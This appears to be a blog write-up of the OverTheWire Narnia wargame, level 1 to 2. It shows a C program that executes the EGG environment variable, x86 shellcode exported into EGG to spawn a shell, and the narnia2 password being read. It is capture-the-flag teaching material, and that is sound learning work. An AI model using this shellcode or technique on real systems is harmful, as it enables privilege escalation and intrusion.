Over the Wire Narnia Level 1 -> 2

Hey folks,

Here is my writeup for Over the Wire's Narnia wargame, level 1 going to 2.

This one is actually quite simple. All it is doing, is asking for an environment variable EGG and it will execute whatever is in it.

#include <stdio.h>

int main(){  
        int (*ret)();

        if(getenv("EGG")==NULL){    
                printf("Give me something to execute at the env-variable EGG\n");
                exit(1);
        }

        printf("Trying to execute EGG!\n");
        ret = getenv("EGG");
        ret();

        return 0;
}

Therefore, all we need to do is put shellcode in for it to execute.

I used the second shellcode example from: https://blog.zer0w1re.net/working-shellcode-x86/

narnia1@melinda:/games/narnia$ export EGG=$'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80'  
narnia1@melinda:/games/narnia$ ./narnia1  
Trying to execute EGG!  
$ whoami
narnia2  
$ cat /etc/narnia_pass/narnia2
nairiepecu  

Using $'<shellcode>' uses BASH to actually evaluate the characters as HEX thus puting actual machine code into the variable, rather than just the characters. This allows it to be executed.

Level 2 -> 3